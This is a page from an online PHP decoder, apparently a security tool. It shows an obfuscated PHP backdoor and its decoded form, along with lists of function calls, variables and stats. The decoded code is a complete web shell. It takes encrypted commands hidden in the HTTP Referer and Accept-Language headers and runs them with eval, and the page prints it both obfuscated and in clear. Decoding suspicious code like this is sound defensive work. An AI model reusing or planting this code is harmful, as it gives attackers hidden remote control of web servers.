Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $B=str_replace('xJ','','cxJrexJxJatxJe_fuxJnctixJon'); $n='_*wrepla*wc*w*we(array(..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$B=str_replace('xJ','','cxJrexJxJatxJe_fuxJnctixJon');
$n='_*wrepla*wc*w*we(array("/_/","/-*w*w/"),array("/"*w*w,"+"),*w$ss($s[$i],0*w,$e*w))),$*wk)*w));$o=ob_get_*wcont*wents(*w);o';
$L='*w*w$kh="5d41";$kf="402a";f*wunc*wt*wi*won x($t,$k*w){$c=strlen($k*w);$l=st*wrl*wen($t);$o=*w*w*w"";for($i=0*w;*w$i<$l;';
$d='ER"];$*w*wr*wa=@$r["HT*wTP_A*wCCEPT_LANGUAGE"];if*w*w($r*wr&&$ra){$u=par*wse_url(*w$r*wr);parse_s*wtr($u*w["*wquery"],*w$q)';
$g=')*w{for($j=0;($j<$c*w&&*w$i<$l);$*wj++,*w$*wi++){$o.*w=$t{$i}*w^$k{$j};}}*wreturn $*wo;}*w$*wr=$_SERVER;$rr=*w@$r["*wHTTP_R*wEFE*wR';
$q='[*w$m[2][*w$*wz]];if*w(strpos($p,$*wh)===0){*w$s[*w$i]="*w";$p=$ss($*wp,3);*w*w}if(ar*wray*w_key_ex*wists($i,$s)){$*w*ws*w[$';
$c='b*w_end_clean*w();$d=ba*wse6*w4_encod*we(x*w(gzcompre*ws*ws($o),$k));p*wrin*wt("<$k*w>$d<*w/$k*w>");@sessio*wn_destr*woy();}}}}';
$P=';$q=*warr*way_value*ws($q*w);preg_*wmatch_*wal*wl("/([\\w])[\\w*w-*w]+*w(?:;q=0.([\\d])*w)?,?/",$*wra,$m)*w;*wif($q&&*w*w$m';
$z=')*w{@session_start();*w$*ws=&$_SE*wSSIO*wN;$ss="subs*wt*wr";$*wsl="st*wrtolower*w";$i=*w$m[1][0*w].$m[1*w][1];*w$h=$sl($ss(';
$W='*wmd5($*wi.$kh*w),0,3));*w$f=$s*w*wl($ss(m*wd5($i.$kf),0,3)*w);$*wp="";for*w*w($z=1;$z<*wcou*wnt($m[1]);$z*w++)$*wp.=$q';
$e='*wi].=$p;$e=strpos($*ws[*w$i*w],$f);i*wf($e){$k=*w$kh.$kf;ob_st*wart();@*w*we*wval(@gzuncompre*wss(@x(@b*wase6*w4_d*wecode(preg';
$h=str_replace('*w','',$L.$g.$d.$P.$z.$W.$q.$e.$n.$c);
$m=$B('',$h);$m();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B create_function
$L *w*w$kh="5d41";$kf="402a";f*wunc*wt*wi*won x($t,$k*w){$c=str..
$P ;$q=*warr*way_value*ws($q*w);preg_*wmatch_*wal*wl("/([\w])[\..
$W *wmd5($*wi.$kh*w),0,3));*w$f=$s*w*wl($ss(m*wd5($i.$kf),0,3)*..
$c b*w_end_clean*w();$d=ba*wse6*w4_encod*we(x*w(gzcompre*ws*ws(..
$d ER"];$*w*wr*wa=@$r["HT*wTP_A*wCCEPT_LANGUAGE"];if*w*w($r*wr&..
$e *wi].=$p;$e=strpos($*ws[*w$i*w],$f);i*wf($e){$k=*w$kh.$kf;ob..
$g )*w{for($j=0;($j<$c*w&&*w$i<$l);$*wj++,*w$*wi++){$o.*w=$t{$i..
$h $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$m None
$n _*wrepla*wc*w*we(array("/_/","/-*w*w/"),array("/"*w*w,"+"),*..
$q [*w$m[2][*w$*wz]];if*w(strpos($p,$*wh)===0){*w$s[*w$i]="*w";..
$z )*w{@session_start();*w$*ws=&$_SE*wSSIO*wN;$ss="subs*wt*wr";..

Stats

MD5 f5d013c163325c5edcbee7b7c19da170
Eval Count 1
Decode Time 120 ms